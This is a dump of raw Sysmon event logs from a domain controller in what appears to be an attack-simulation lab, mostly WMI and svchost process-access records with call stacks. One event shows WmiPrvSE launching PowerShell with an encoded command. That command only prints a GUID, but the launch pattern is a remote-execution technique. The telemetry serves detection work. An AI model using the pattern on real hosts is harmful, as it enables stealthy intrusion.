16:54:43.342{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.342{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002242970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002242969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.345{05ADC7E1-6DD3-603E-DCAA-00000000AD01}11576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedComm VwByAGkAdABlAC0ASABvAHMAdAAgAGIAYQA4ADYAMQA3ADIAYQAtADIAZQBmADcALQA0ADAANgAwAC0AYQBkADkANgAtADAAMABlADYANwBkAGMAZgAxADEAZQA0AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 23542300x80000000000000002242968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.342{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C5FC6C306DBFF85BBD79D1D92DB132C,SHA256=15491596912BA7222D699DC852258E9B2B07706A7E0B51744AE8FC490B60DB0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.326{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.326{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.326{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DBAA-00000000AD01}16244C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-DAAA-00000000AD01}13472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D9AA-00000000AD01}4448C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D7AA-00000000AD01}4420C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77D2C3689D75FE09032131150E41A4B6,SHA256=34C7FCE65C6B5A05C5EF368E897054B5B5F5916D99E988E2C382B96FC73F38F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.311{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242949Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 